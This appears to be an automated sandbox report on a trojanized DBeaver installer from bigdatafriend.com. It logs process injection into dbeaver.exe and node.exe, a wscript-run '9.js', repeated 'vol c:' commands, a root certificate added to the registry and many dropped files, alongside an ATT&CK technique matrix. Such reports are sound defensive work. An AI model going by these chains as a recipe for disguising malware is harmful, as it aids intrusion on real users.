Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\ProgramData\jvb\dbeaver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\ProgramData\jvb\dbeaver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jvb\node.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\javaaccessbridge.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\net.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\sunmscapi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jli.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jrunscript.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\verify.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\javaw.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\prefs.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\server\jvm.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jimage.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\java.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-aarch64\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\zip.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\management_ext.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\awt.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\dbeaver.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\splashscreen.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\swt-awt-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UserInfo.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\rmiregistry.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\w2k_lsa_auth.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\System.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\windowsaccessbridge-64.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\klist.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\WebView2Loader.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\swt-gdip-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\kinit.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\fontmanager.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\nio.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\dbeaver-cli.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jstack.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\ktab.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jmap.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jinfo.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86-64\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\keytool.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\vcruntime140_1.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86\jnidispatch.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jps.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\msvcp140.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\vcruntime140.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\j2gss.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UAC.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jsound.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\javajpeg.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jnicrypt64.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\sspi_bridge.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\swt-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\management.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jkiss_wmi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaas.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\freetype.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jcmd.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jabswitch.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\Uninstall.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\StartMenu.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\lcms.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\swt-wgl-win32-4963r5.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\LangDLL.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\attach.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jstat.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\mlib_image.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\j2pkcs11.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.2.800.v20231003-1442\eclipse_11802.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\nsDialogs.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jawt.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccesswalker.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccessinspector.exeJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\rmi.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\java.dllJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\jvb\dbeaver.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\ProgramData\jvb\dbeaver.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe" "9.js

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeMemory allocated: C:\ProgramData\jvb\node.exe base: 5010000 protect: page read and write
Source: C:\Windows\System32\msiexec.exeMemory written: C:\ProgramData\jvb\dbeaver.exe base: 1C0000
Source: C:\Windows\System32\msiexec.exeMemory written: C:\ProgramData\jvb\dbeaver.exe base: 3742D8
Source: C:\Windows\System32\msiexec.exeMemory written: C:\ProgramData\jvb\dbeaver.exe base: 3751E8
Source: C:\Windows\System32\wscript.exeMemory written: C:\ProgramData\jvb\node.exe base: 5010000
Source: C:\Windows\System32\wscript.exeMemory written: C:\ProgramData\jvb\node.exe base: 46CD2D8
Source: C:\Windows\System32\wscript.exeMemory written: C:\ProgramData\jvb\node.exe base: 46CE1E8
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\ProgramData\jvb\node.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "vol c:"
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jvb\dbeaver.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jvb\dbeaver.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ProgramData\jvb\node.js VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ProgramData VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ProgramData\jvb VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ProgramData\jvb\node.js VolumeInformation
Source: C:\ProgramData\jvb\node.exeQueries volume information: C:\ProgramData\jvb\node.js VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Replication Through Removable Media
Windows Management Instrumentation1
Windows Service
1
Windows Service
11
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
211
Process Injection
1
Modify Registry
LSASS Memory11
Peripheral Device Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
2
Disable or Modify Tools
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
DLL Side-Loading
1
DLL Side-Loading
211
Process Injection
NTDS13
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Extra Window Memory Injection
1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi0%Avira URL Cloudsafe
SourceDetectionScannerLabelLink
C:\ProgramData\jvb\dbeaver.exe0%ReversingLabs
C:\ProgramData\jvb\node.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\Uninstall.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\WebView2Loader.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\dbeaver-cli.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\dbeaver.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jkiss_wmi.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jnicrypt64.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\aix-ppc64\libjnidispatch.a0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\aix-ppc\libjnidispatch.a0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-aarch64\jnidispatch.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86-64\jnidispatch.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\com.sun.jna_5.13.0.v20230812-1000\com\sun\jna\win32-x86\jnidispatch.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.2.800.v20231003-1442\eclipse_11802.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\swt-awt-win32-4963r5.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\swt-gdip-win32-4963r5.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\swt-wgl-win32-4963r5.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\swt-win32-4963r5.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\LangDLL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\StartMenu.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UAC.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\UserInfo.dll0%ReversingLabs
